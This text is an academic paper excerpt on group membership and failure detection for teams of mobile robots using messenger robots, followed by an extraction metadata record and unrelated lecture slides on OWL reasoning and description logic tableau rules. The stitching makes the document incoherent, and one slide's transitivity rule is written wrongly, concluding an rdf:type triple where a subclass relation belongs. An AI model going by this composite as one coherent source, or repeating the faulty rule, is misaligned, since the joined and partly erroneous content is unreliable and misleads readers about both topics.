4.1.1 Description of the algorithm (Model A)
- **Condition**: The team initiator has at least one messenger in its pool.
We illustrate the group membership algorithm, in the case of failure-free by the following simple example:
Consider a system composed of three teams, we construct a logical ring of nodes \(\{T_1, T_2, T_3\}\). The initial view is: \(\{T_1, T_2, T_3\}\). We suppose that the team \((T_2)\) starts to propose a new view (team initiator), and it invokes \(join(T_p)\) operation, the team \(T_3\) invokes a leave\((T_3)\) operation, and \(T_1\) does not execute any operation.
The team \(T_2\) starts the propose round by sending a messenger to \(T_3\), the next team in the logical ring. The messenger transports a message which proposes the view: \(v_T = \{T_1, T_2, T_3, T_p\}\).
When the team \(T_3\) receives this message, it behaves as follows:
1. generates its own message: \(T_3, leave(T_3)\)
2. merges $msg_{T_2}$ and $msg_{T_3}$ then proposes the view $v^i_{T_3} = \{T_1, T_2, T_p\}$.
3. sends a messenger to $T_1$, with the new view $v^i_{T_3}$.
When the team $T_1$ receives the messenger, it behaves in the same previous manner with the difference that $T_1$ does not change anything, it acknowledges the current proposed view, and sends a messenger to $T_2$, which terminates the propose round and starts the commit round.
$T_2$ starts the commit round by sending the message \textit{commit}\{$T_1, T_2, T_p$\} to $T_3$ which acknowledges the current view $v^i$ and sends a messenger to the next team.
The algorithm terminates when $T_2$ receives back the commit message that it has sent, and the group membership algorithm is successfully terminated, such that the team $T_p$ has joined the group and $T_3$ has left it, and the new view is $v^i = \{T_1, T_2, T_p\}$.
### 4.1.2 Correctness arguments (Model A)
In this model, both messengers and teams are correct, which guarantees the correctness of the communications between teams, so all messages sent by a team are correctly received by the destination team, and also proves the correct termination of this algorithm, since it is guaranteed that a messenger returns back to the initiator after both the propose and commit rounds.
We show that the three properties of the Group Membership protocol, are satisfied by our algorithm.
1. Validity: According to the algorithm A, the removal of a team from a view is impossible unless some team executes the operation \textit{leave}(). Also, the existence of a new team in a view, is possible only by executing the operation \textit{join(new-team)}.
2. Agreement: The commit round of the algorithm, allows to circulate the same view $v_{fin}$ to all the teams, so the new view is $v_{fin}$, and after the termination of the algorithm, any two teams install the same view.
3. Termination: When a team $T_p$ executes \textit{join($T_q$)}, this request is broadcasted to the teams that follow $T_p$ in the logical ring during the propose round, and then all the teams in the system agree on \textit{join($T_q$)} via the commit round. So, eventually a view $v'$ is installed such that $T_q \in v'$.
### 4.1.3 Behavior Evaluation (Model A)
The algorithm executes two rounds, propose and commit. Since there are no failures in this model, the messenger performs $2n$ hops between the teams, in order to define a new view. In the Model A, the energy and time required are equivalent to $O(2n)$.
### 4.2 Group membership & messengers failure (Model B)
We study the group membership and view synchrony in our system model, in presence of messengers failure.
#### 4.2.1 Description of the algorithm (Model B)
- **Condition**: The team initiator has initially at least $(M + 1)$ messengers in its pool.
In Model B, the team initiator executes the propose and commit rounds by sending a set of messengers which has at least one correct. We illustrate the algorithm by the same example of Model A:
The team $T_2$ starts the propose round by sending a set of $(M + 1)$ messengers to $T_3$, such that each messenger carries the same message which proposes the view: $v^i_{T_2} = \{T_1, T_2, T_p\}$.
When the team $T_3$ receives this set of messengers (or at least one), it behaves as follows:
1. unifies all the identical messages received from $T_2$.
2. generates its own message: $T_3$.\textit{leave($T_3$)}.
3. merges $msg_{T_2}$ and $msg_{T_3}$, then proposes the view $v^i_{T_3} = \{T_1, T_2, T_p\}$.
4. sends the set of messengers that it has received to $T_1$, with the new view $v^i_{T_3}$.
When \( T_1 \) receives the set of messengers from \( T_3 \), it does not change the view, acknowledges the current proposed view, and sends the messengers to \( T_2 \), which terminates the propose round and starts the commit round when it receives at least one messenger from \( T_1 \). \( T_2 \) starts the commit round by sending the same set of messengers with the message \( \text{commit}\{T_1, T_2, T_p\} \) to \( T_3 \) which acknowledges the current view \( v^t \) and sends the set to \( T_1 \).
The algorithm terminates when \( T_2 \) receives back at least one messenger of this set carrying the commit message that it has sent, and the group membership algorithm is successfully terminated, such that the team \( T_p \) has joined the group and \( T_3 \) has left it, and the new view is \( v^i = \{T_1, T_2, T_p\} \).
4.2.2 Correctness arguments (Model B)
The condition \( |\text{initiator}| \geq (\bar{M} + 1) \) guarantees that the team initiator has at least one correct messenger, we show that this condition ensures the correct termination of the algorithm.
In the Model B, we need to send \((\bar{M} + 1)\) messengers from the initiator to the next team, in order to guarantee the correct reception of messages by the next team, 4 supposing that all the teams are correct. (assumptions of this failure model)
The cardinality of this set remains \( \geq 1 \) and \( \leq (\bar{M} + 1) \) because some messengers may crash before reaching their destinations, and this set of messengers is responsible of all the communications between the teams until return back to the initiator. (propose and commit rounds).
The algorithm guarantees that the same new view is acknowledged by all the teams in the system, since there is no team crash in this model.
The properties: Validity, Agreement, and Termination are discussed exactly as in the previous failure-free model.
4.2.3 Behavior Evaluation (Model B)
The initiator sends a set of \((\bar{M} + 1)\) messengers, and this same set performs \( 2n \) hops between the teams, so the energy consumed is of the order: \( O(2(\bar{M} + 1)n) \). But the time required is the same as in the Model A, because the robots move simultaneously. So, the time required to run the algorithm is \( O(2n) \).
4.3 Group membership & teams and messengers failure (Model C)
We study the algorithm of group membership in presence of both teams and messengers failure.
4.3.1 Description of the algorithm (Model C)
- **Condition 1**: The team initiator is a correct team.
- **Condition 2**: The team initiator has initially at least \((\bar{M} + 1)\) messengers in its pool.
We illustrate the group membership algorithm by the following simple example:
Consider a system composed of four teams, we construct a logical ring of nodes \( \{T_1, T_2, T_3, T_4\} \). The initial view is: \( \{T_1, T_2, T_3, T_4\} \). We suppose that the team \( T_2 \) starts to propose a new view (team initiator), and it invokes \( \text{join}(T_p) \) operation, for simplicity we suppose that other teams do not execute any operation, and the teams \( T_1 \) and \( T_3 \) are faulty.
**propose round** The team \( T_2 \) starts the propose round by sending a set composed of \((\bar{M} + 1)\) messengers to \( T_3 \), such that each messenger in the set carries the same message which proposes the view: \( v^i_{T_2} = \{T_1, T_2, T_3, T_4, T_p\} \). When this set of messengers arrives to the site of \( T_3 \), it performs a crash detection protocol based on hand-shaking with all the workers of \( T_3 \). It confronts 2 cases:
- **\( T_3 \) has crashed**: the set of messengers returns back to \( T_2 \) indicating the crash of \( T_3 \), then the initiator changes the current view by removing \( T_3 \) from the group (forced leave) and sends this set of messengers to \( T_4 \) provided with the current proposed view \( v^i_{T_2} = \{T_1, T_2, T_4, T_p\} \).
• $T_3$ is alive: it unifies the identical messages, and sends the set of messengers to $T_4$, as in Model B.
The propose round terminates when the team initiator receives back its set of messengers (or part of it).
**commit round** $T_2$ starts the commit round by sending the set of messengers with the message $ ext{commit}\{T_1, T_2, T_4, T_p\}$ to $T_4$, which acknowledges the current view $v'$ and sends the set to $T_1$. When the messengers arrive to the site of $T_1$ they confront 2 cases:
• $T_1$ has crashed: the set of messengers returns back to $T_2$ indicating the crash of $T_1$, then the initiator changes the current view by removing $T_1$ from the group (forced leave) and restarts the commit round by sending this set of messengers to $T_4$ again, provided with the current commit view $v^p = \{T_2, T_4, T_p\}$. Then $T_4$ acknowledges the commit view and sends the messengers to $T_2$.
• $T_1$ is alive: it unifies the identical messages, and sends the set of messengers to $T_2$, as in Model B.
The algorithm terminates when $T_2$ receives back at least one messenger belongs to the set it has sent, provided with the commit message, and the group membership algorithm is successfully terminated, such that the team $T_p$ has joined the group and $(T_1, T_3)$ have left it because of their crashes, and the new view is $v^a = \{T_2, T_4, T_p\}$.
### 4.3.2 Correctness arguments (Model C)
In this model we have team failures in addition to messenger failures, so we need extra specifications concerning a team correctness.
We show that the two previous conditions guarantee that the algorithm terminates correctly. In our model a messenger can perform at most two hops, so when a messenger moves to a crashed team, the next hop should be to a correct one, else the messenger would be idle. The messenger returns to the team initiator after detecting a crashed team, and the initiator is a correct team according to (condition 1), while (condition 2) guarantees that the set of messengers sent by the initiator, has at least one correct messenger. This set performs all the hops between the teams as we discussed in the Model B.
In this model, we provide the system with a perfect failure detector, because the detection of a crashed team is carried out by a local hand-shaking mechanism, between at least one correct messenger and all the workers of the team. After detecting a crashed team by a messenger, this messenger moves to the team initiator (correct team), and proclaims the crashed team, consequently, the crash is detected correctly and deterministically.
The commit round, permits to provide each non-crashed team with the most recent view, because the initiator restarts the commit round whenever it detects a crashed team, so the commit round terminates correctly by delivering the same view $v_{fin}$ to all non-crashed teams.
The properties: Validity, Agreement, and Termination are discussed exactly as in the Model A.
### 4.3.3 Behavior Evaluation (Model C)
The set of $(\overline{M} + 1)$ messengers may perform additional hops because of teams failures, so this set needs to go backward to the initiator whenever it detects a crashed team. (additional $T$ hops in the propose round), and $(n \cdot \overline{T}$ hops during the commit round).
The energy consumed by messengers is calculated as follows:
- Propose round (worst case): $(n + T)(\overline{M} + 1)$.
- Commit round (worst case): $n \cdot T(\overline{M} + 1)$.
The total energy consumption is $(\overline{M} + 1)(\overline{T} + 1) \cdot n + T(\overline{M} + 1)$.
The behavior evaluation in terms of energy can be written as: $O(\alpha \cdot n + \beta)$.
The behavior in terms of time is $(\overline{T} + 1) \cdot n + T$, also it can be expressed as: $O(\lambda \cdot n + \mu)$.
**Discussion** The required energy and time to run the algorithm increase when fault tolerance requirements become harder. In the Model A the algorithm requires energy and time proportional to $(2n)$, where $n$ is the size of the system (group of teams). In Model B the energy becomes more significant than in Model A. It is $\overline{M}$ times greater, which is justified
by the cost required to tolerate the messenger failures, but the execution time is equivalent to that in Model A. When the system is prone to team failures in addition to messenger failures in Model C, the required energy is \((M \cdot T)\) times greater than that in the Model A, while the execution time is only \(T\) times greater.
5 Conclusion
We have introduced a distributed asynchronous system model composed of a group of teams of cooperative mobile robots. The teams in our model communicate by physical robot messengers. We have presented a group membership algorithm, discussed its correctness, and evaluated its behavior in terms of energy and time, in three possible failure models, the failure-free, the messenger failures, and both team & messenger failures models.
We have shown the conditions that should be satisfied to solve the problem of group membership in our system model in each different failure model. This technique of communications between teams of robots permits to implement a perfect failure detector since the detection of a crashed team takes place locally on its site. This property permits to solve many agreement problems in asynchronous distributed systems composed of a group of teams of robots.
Furthermore, in this model faulty robot messengers can be mapped to lossy channels in classical distributed systems. We guaranteed reliable communications in Model B by using one set of messengers that has at least a correct messenger, this set circulates the messages and supports all the communications between the teams of the system.
The model presented in our paper can be applied in situations where there are no established communications infrastructures for cooperative mobile robots.
In the future, we also intend to further investigate other distributed algorithms for cooperative autonomous mobile systems.
Acknowledgments
This research was conducted for the program “Fostering Talent in Emergent Research Fields” in Special Coordination Funds for Promoting Science and Technology by the Japan Ministry of Education, Culture, Sports, Science and Technology.
References
Algorithm of group membership & failure-free
In this section, we present our algorithm of group membership in the case of failure-free (Model A):
Algorithm(A): Group membership (failure-free)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{T_i, i \in [1..n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( operation = \{\text{join(new team)}, \text{leave(team)}\} \)
main algorithm \((T_i)\)
7: if \((operation = \text{join(new team)})\) then
8: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \cup \{\text{new team}\}) \)
9: end if
10: if \((operation = \text{leave(team)})\) then
11: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \setminus \{\text{team}\}) \)
12: end if
13: if \((T_i = \text{initiator})\) and \((|\text{initiator}| \geq M + 1)\) then
14: \( msg\initiator \leftarrow \text{initiator}(ID) \)
15: \( msg \leftarrow msg \cup \{v_{act}\} \)
16: send a messenger with (msg) to next\((T_i)\)
17: wait until reception of the messenger sent
18: when reception of the messenger sent
19: begin-commit-round()
20: end when
21: end if
22: if \((T_i \neq \text{initiator})\) then
23: \( msg \leftarrow msg \cup \{v_{act}\} \)
24: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
25: end if
procedure begin-commit-round
26: if \((T_i = \text{initiator})\) then
27: \( v_{fin} \leftarrow v_{act} \)
28: \( msg \leftarrow \text{commit}(v_{fin}) \)
29: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
30: wait until reception of the messenger sent
31: when reception of the messenger sent
32: terminate-commit-round()
33: end when
34: else
35: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
36: end if
end procedure
37: \( new\_view \leftarrow v_{fin} \)
Algorithm of group membership & messengers failure
We present in this section, our algorithm of group membership in presence of messenger failures (Model B):
Algorithm(B): Group membership (messengers failure)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{T_i, i \in [1..n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( operation = \{\text{join(new team)}, \text{leave(team)}\} \)
main algorithm \((T_i)\)
7: if \((operation = \text{join(new team)})\) then
8: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \cup \{\text{new team}\}) \)
9: end if
10: if \((operation = \text{leave(team)})\) then
11: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \setminus \{\text{team}\}) \)
12: end if
13: if \((T_i = \text{initiator})\) and \((|\text{initiator}| \geq M + 1)\) then
14: \( msg\initiator \leftarrow \text{initiator}(ID) \)
15: \( msg \leftarrow msg \cup \{v_{act}\} \)
16: send set of \((M + 1)\) messengers provided with (msg) to next\((T_i)\)
17: wait until reception of the messengers sent
18: when reception of messengers sent
19: begin-commit-round()
20: end when
21: end if
22: if \((T_i \neq \text{initiator})\) then
23: unify all the identical propose messages received from previous\((T_i)\) into one message (msg)
24: \( msg \leftarrow msg \cup \{v_{act}\} \)
25: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
26: end if
procedure begin-commit-round
27: if \((T_i = \text{initiator})\) then
28: \( v_{fin} \leftarrow v_{act} \)
29: \( msg \leftarrow \text{commit}(v_{fin}) \)
30: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
31: wait until reception of the messengers sent
32: when reception of messengers sent
33: terminate-commit-round()
34: end when
35: else
36: unify all the identical commit messages received from previous\((T_i)\) into one message (msg)
37: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
38: end if
end procedure
39: \( new\_view \leftarrow v_{fin} \)
Algorithm group membership
(teams and messengers failure)
In this section, we present our algorithm of group membership
in presence of both teams and messengers failure (Model C):
Algorithm(C): Group membership (teams and messengers failure)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{ T_i, i \in [1, n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old\_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( list \leftarrow v_{ini} \)
7: operation = \{join(new\_team), leave(team)\}
8: if \( \text{operation} = \text{join (new\_team)} \) then
9: \( T_i\_proposer(v_{act} \leftarrow v_{act} \cup \{ \text{new}\_team\}) \)
10: end if
11: if \( \text{operation} = \text{leave(team)} \) then
12: \( T_i\_proposer(v_{act} \leftarrow v_{act} \setminus \{ \text{team}\}) \)
13: end if
messenger:
function detect\_crash(messenger, team)
14: detect\_crash \leftarrow TRUE
15: for all robot-worker \( (w) \in \text{team} \) do
16: if shake-hand(messenger, w) then
17: detect\_crash \leftarrow FALSE \{the team is still alive\}
18: exit
19: end if
20: end for
end function
21: if detect\_crash(messenger, \( T_i \)) then
22: move to the team initiator.
23: end if
Team:
24: if \( (T_i = \text{initiator}) \) and \( (\text{initiator} \geq (M + 1)) \) then
25: msg\_initiator \leftarrow \text{initiator}(ID)
26: msg \leftarrow msg \cup \{v_{act}\}
27: send set of \( (M + 1) \) messengers provided with (msg) to next(\( T_i \))
end Team
Handling crashed teams(propose round)
28: when reception of messengers carrying the failure detection message \( T_k \) has crashed and the current message is (msg)
29: \( v_{act} \leftarrow v_{act} \setminus \{T_k\} \)
30: \( msg \leftarrow msg \cup \{v_{act}\} \)
31: if \( \text{next}(T_k) \neq \text{initiator} \) then
32: send the received set of messengers carrying (msg) to next(\( T_k \))
33: else
34: begin-commit-round()
35: end if
36: end when
end Handling crashed teams (propose round)
37: wait until reception of messengers sent.
|
{"Source-Url": "https://dspace.jaist.ac.jp/dspace/bitstream/10119/4786/1/IS-RR-2004-019.pdf", "len_cl100k_base": 9745, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 44832, "total-output-tokens": 11193, "length": "2e13", "weborganizer": {"__label__adult": 0.0003788471221923828, "__label__art_design": 0.0005440711975097656, "__label__crime_law": 0.0005240440368652344, "__label__education_jobs": 0.000942707061767578, "__label__entertainment": 0.000171661376953125, "__label__fashion_beauty": 0.00017821788787841797, "__label__finance_business": 0.00054168701171875, "__label__food_dining": 0.0004229545593261719, "__label__games": 0.0012140274047851562, "__label__hardware": 0.003108978271484375, "__label__health": 0.0008182525634765625, "__label__history": 0.00060272216796875, "__label__home_hobbies": 0.00019240379333496096, "__label__industrial": 0.0011892318725585938, "__label__literature": 0.00047206878662109375, "__label__politics": 0.0004277229309082031, "__label__religion": 0.0005755424499511719, "__label__science_tech": 0.46142578125, "__label__social_life": 0.00013005733489990234, "__label__software": 0.01337432861328125, "__label__software_dev": 0.5107421875, "__label__sports_fitness": 0.00036787986755371094, "__label__transportation": 0.0013475418090820312, "__label__travel": 0.0002541542053222656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39494, 0.0388]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39494, 0.12582]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39494, 0.87861]], "google_gemma-3-12b-it_contains_pii": [[0, 645, false], [645, 975, null], [975, 3743, null], [3743, 7604, null], [7604, 10602, null], [10602, 14252, null], [14252, 17621, null], [17621, 21237, null], [21237, 25145, null], [25145, 29319, null], [29319, 33427, null], [33427, 37461, null], [37461, 39494, null]], "google_gemma-3-12b-it_is_public_document": [[0, 645, true], [645, 975, null], [975, 3743, null], [3743, 7604, null], [7604, 10602, null], [10602, 14252, null], [14252, 17621, null], [17621, 21237, null], [21237, 25145, null], [25145, 29319, null], [29319, 33427, null], [33427, 37461, null], [37461, 39494, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39494, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39494, null]], "pdf_page_numbers": [[0, 645, 1], [645, 975, 2], [975, 3743, 3], [3743, 7604, 4], [7604, 10602, 5], [10602, 14252, 6], [14252, 17621, 7], [17621, 21237, 8], [21237, 25145, 9], [25145, 29319, 10], [29319, 33427, 11], [33427, 37461, 12], [37461, 39494, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39494, 0.03364]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
31822b01c70547745cfb9b5ff32095a05909f508
|
Semantic Reasoning
Outline
• Automated Reasoning
• OWL Semantics and Profiles
• Reasoning with Description Logics
• SWRL
Reasoning
@prefix ex: <http://example.org/>.
ex:Mammal rdf:type owl:Class.
# Canine is a subclass of Mammal
ex:Canine rdf:type owl:Class;
rdfs:subClassOf ex:Mammal.
# Daisy is implicitly a member of the class Mammal
ex:Daisy rdf:type ex:Canine.
• Daisy is a Canine
– Explicit fact
• Daisy is a Mammal
– Implicit (implied) fact
• How to derive implied information?
Reasoners
• Applications that perform inference are called reasoning engines, or reasoners.
• A reasoning engine is a system that infers new information based on the contents of a knowledgebase.
• Various reasoning approaches: rules and rule engine, triggers on database or RDF store, decision trees, tableau algorithms, hard-coded logic, ...
Rules-based reasoning
• Combine the assertions contained in a knowledgebase with a set of logical rules in order to derive assertions or perform actions.
• Rules are if-then statements:
– Condition
– Conclusion
• Any time a set of statements matches the conditions of the rule, the statements in the conclusion are implicit in the knowledgebase.
Example
[IF]
?class1 rdf:subClassOf ?class2
AND
?instance rdf:type ?class1
[THEN]
?instance rdf:type ?class2
[IF]
?class2 rdf:subClassOf ?class1
AND
?class3 rdf:subClassOf ?class2
[THEN]
?class3 rdf:type ?class1
Note: rules systems are different
• Different rules-based languaged offer different expressive power:
– Conjunctive rules: A and B imply C
– Disjuntive rules: A or B imply C
– Negation as a failure: not A implies B
Note: Rule sets are different
- **Predefined** sets of rules (e.g. OWL semantics)
- **Custom** sets of rules (e.g. your own application)
Inference
• Inference = Applying the set of rules to the knowledge base
• Problem: the huge space of all possible applicable rules
• Two main approaches:
– **Forward Chaining** Inference: Compute all the facts that are entailed by the currently asserted facts
– **Backward Chaining** Inference: Starting from an unknown fact that we want to know (whether it’s true or not), try to construct a chain of entailments rooting back in the known facts
Forward Chaining
Entailments
Fact 5
Fact 4
Fact 3
Explicit Facts
Fact 1
Fact 2
Entailments
Fact 5
Fact 10
Fact 4
Fact 8
Fact 9
Fact 3
Fact 7
Explicit Facts
Fact 1
Fact 2
Fact 6
Backward chaining
## Comparison
### Forward Chaining
- After reasoning, all queries are straightforward
- Much memory may be needed for inferred model
- May be computationally intensive at startup
- Difficult to update when facts are removed/modified
### Backward Chaining
- Does not compute whole model
- Usually faster
- Each query needs to re-compute part of the model (caching is essential)
- No start-up overhead
- Lower memory requirements
- Efficiency depending on exploration strategies/heuristics
Outline
- Automated Reasoning
- **OWL Semantics and Profiles**
- Reasoning with Description Logics
- **SWRL**
OWL2 semantics
• The Direct Semantics and the RDF-Based Semantics provide two alternative ways of assigning meaning to OWL 2 ontologies
– A correspondence theorem provides a link between the two
• These two semantics are used by reasoners and other tools to answer class consistency, subsumption, instance retrieval queries, ...
OWL 2 RDF-based semantics
• Assigns meaning directly to RDF graphs and so indirectly to ontology structures via the Mapping to RDF graphs
• The RDF-Based Semantics is fully compatible with the RDF Semantics, and extends the semantic conditions defined for RDF
• The RDF-Based Semantics can be applied to any OWL 2 Ontology, without restrictions, as any OWL 2 Ontology can be mapped to RDF
• “OWL 2 Full” is used informally to refer to RDF graphs considered as OWL 2 ontologies and interpreted using the RDF-Based Semantics
• “OWL 2 Full” is not decidable
OWL 2 direct semantics
• Assigns meaning directly to ontology structures, resulting in a semantics compatible with the model theoretic semantics of the SROIQ description logic
– SROIQ is a fragment of first order logic
• The advantage of this close connection is that the extensive description logic literature and implementation experience can be directly exploited by OWL 2 tools
• Ontologies that satisfy these syntactic conditions are called **OWL 2 DL** ontologies
• **OWL-DL** is decidable
## OWL-DL class constructors
<table>
<thead>
<tr>
<th>Constructor</th>
<th>DL Syntax</th>
<th>Example</th>
<th>Modal Syntax</th>
</tr>
</thead>
<tbody>
<tr>
<td>intersectionOf</td>
<td>$C_1 \sqcap \ldots \sqcap C_n$</td>
<td>Human $\sqcap$ Male</td>
<td>$C_1 \sqcap \ldots \sqcap C_n$</td>
</tr>
<tr>
<td>unionOf</td>
<td>$C_1 \sqcup \ldots \sqcup C_n$</td>
<td>Doctor $\sqcup$ Lawyer</td>
<td>$C_1 \sqcup \ldots \sqcup C_n$</td>
</tr>
<tr>
<td>complementOf</td>
<td>$\neg C$</td>
<td>$\neg$ Male</td>
<td>$\neg C$</td>
</tr>
<tr>
<td>oneOf</td>
<td>${ x_1 } \sqcup \ldots \sqcup { x_n }$</td>
<td>${ john } \sqcup { mary }$</td>
<td>$x_1 \sqcup \ldots \sqcup x_n$</td>
</tr>
<tr>
<td>allValuesFrom</td>
<td>$\forall P.C$</td>
<td>$\forall$ hasChild.Doctor</td>
<td>$[P]C$</td>
</tr>
<tr>
<td>someValuesFrom</td>
<td>$\exists P.C$</td>
<td>$\exists$ hasChild.Lawyer</td>
<td>$\langle P \rangle C$</td>
</tr>
<tr>
<td>maxCardinality</td>
<td>$\leq nP$</td>
<td>$\leq 1$ hasChild</td>
<td>$[P]_{n+1}$</td>
</tr>
<tr>
<td>minCardinality</td>
<td>$\geq nP$</td>
<td>$\geq 2$ hasChild</td>
<td>$\langle P \rangle_n$</td>
</tr>
</tbody>
</table>
## OWL-DL Axioms
<table>
<thead>
<tr>
<th>Axiom</th>
<th>DL Syntax</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>subClassOf</td>
<td>$C_1 \sqsubseteq C_2$</td>
<td>Human $\sqsubseteq$ Animal $\sqcap$ Biped</td>
</tr>
<tr>
<td>equivalentClass</td>
<td>$C_1 \equiv C_2$</td>
<td>Man $\equiv$ Human $\sqcap$ Male</td>
</tr>
<tr>
<td>disjointWith</td>
<td>$C_1 \sqsubseteq \neg C_2$</td>
<td>Male $\sqsubseteq \neg$ Female</td>
</tr>
<tr>
<td>sameIndividualAs</td>
<td>${x_1} \equiv {x_2}$</td>
<td>${\text{President}_\text{Bush}} \equiv {\text{G.W._Bush}}$</td>
</tr>
<tr>
<td>differentFrom</td>
<td>${x_1} \sqsubseteq \neg {x_2}$</td>
<td>${\text{john}} \sqsubseteq \neg {\text{peter}}$</td>
</tr>
<tr>
<td>subPropertyOf</td>
<td>$P_1 \sqsubseteq P_2$</td>
<td>hasDaughter $\sqsubseteq$ hasChild</td>
</tr>
<tr>
<td>equivalentProperty</td>
<td>$P_1 \equiv P_2$</td>
<td>cost $\equiv$ price</td>
</tr>
<tr>
<td>inverseOf</td>
<td>$P_1 \equiv P_2^-$</td>
<td>hasChild $\equiv$ hasParent$^-$</td>
</tr>
<tr>
<td>transitiveProperty</td>
<td>$P^+ \sqsubseteq P$</td>
<td>ancestor$^+ \sqsubseteq$ ancestor</td>
</tr>
<tr>
<td>functionalProperty</td>
<td>$\top \sqsubseteq \leq 1P$</td>
<td>$\top \sqsubseteq \leq 1\text{hasMother}$</td>
</tr>
<tr>
<td>inverseFunctionalProperty</td>
<td>$\top \sqsubseteq \leq 1P^-$</td>
<td>$\top \sqsubseteq \leq 1\text{hasSSN}^-$</td>
</tr>
</tbody>
</table>
OWL-DL Reasoning Rules
\(\Box\)-rule: if \(C_1 \cap C_2 \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\{C_1, C_2\} \not\subseteq \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{C_1, C_2\}\)
\(\sqcup\)-rule: if \(C_1 \sqcup C_2 \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\{C_1, C_2\} \cap \mathcal{L}(x) = \emptyset\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{E\}\) for some \(E \in \{C_1, C_2\}\)
\(\exists\)-rule: if \(\exists S.C \in \mathcal{L}(x)\), \(x\) is not blocked, and \(x\) has no \(S\)-neighbour \(y\) with \(C \in \mathcal{L}(y)\), then create a new node \(y\) with \(\mathcal{L}((x, y)) := \{S\}\) and \(\mathcal{L}(y) := \{C\}\)
Self-Ref-rule: if \(\exists S.\text{Self} \in \mathcal{L}(x)\) or \(\text{Ref}(S) \in \mathcal{R}_a\), \(x\) is not blocked, and \(S \not\subseteq \mathcal{L}(\langle x, x \rangle)\), then add an edge \(\langle x, x \rangle\) if it does not yet exist, and set \(\mathcal{L}(\langle x, x \rangle) \leftarrow \mathcal{L}(\langle x, x \rangle) \cup \{S\}\)
\(\forall_1\)-rule: if \(\forall S.C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\forall B.S.C \not\subseteq \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{\forall B.S.C\}\)
\(\forall_2\)-rule: if \(\forall B(p).C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, \(p \xrightarrow{S} q\) in \(B(p)\), and there is an \(S\)-neighbour \(y\) of \(x\) with \(\forall B(q).C \not\subseteq \mathcal{L}(y)\), then \(\mathcal{L}(y) \rightarrow \mathcal{L}(y) \cup \{\forall B(q).C\}\)
\(\forall_3\)-rule: if \(\forall B.C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, \(\epsilon \in \mathcal{L}(B)\) and \(C \not\subseteq \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{C\}\)
choose-rule: if \((\leq n S.C) \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and there is an \(S\)-neighbour \(y\) of \(x\) with \(\{C, \neg C\} \cap \mathcal{L}(y) = \emptyset\), then \(\mathcal{L}(y) \rightarrow \mathcal{L}(y) \cup \{E\}\) for some \(E \in \{C, \neg C\}\)
\(\geq\)-rule: if 1. \((\geq n S.C) \in \mathcal{L}(x)\), \(x\) is not blocked
2. there are not \(n\) safe \(S\)-neighbours \(y_1, \ldots, y_n\) of \(x\) with \(C \in \mathcal{L}(y_i)\) and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq n\), then create \(n\) new nodes \(y_1, \ldots, y_n\) with \(\mathcal{L}(\langle x, y_i \rangle) = \{S\}, \mathcal{L}(y_i) = \{C\}\) and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq n\).
\(\leq\)-rule: if 1. \((\leq n S.C) \in \mathcal{L}(z)\), \(z\) is not indirectly blocked
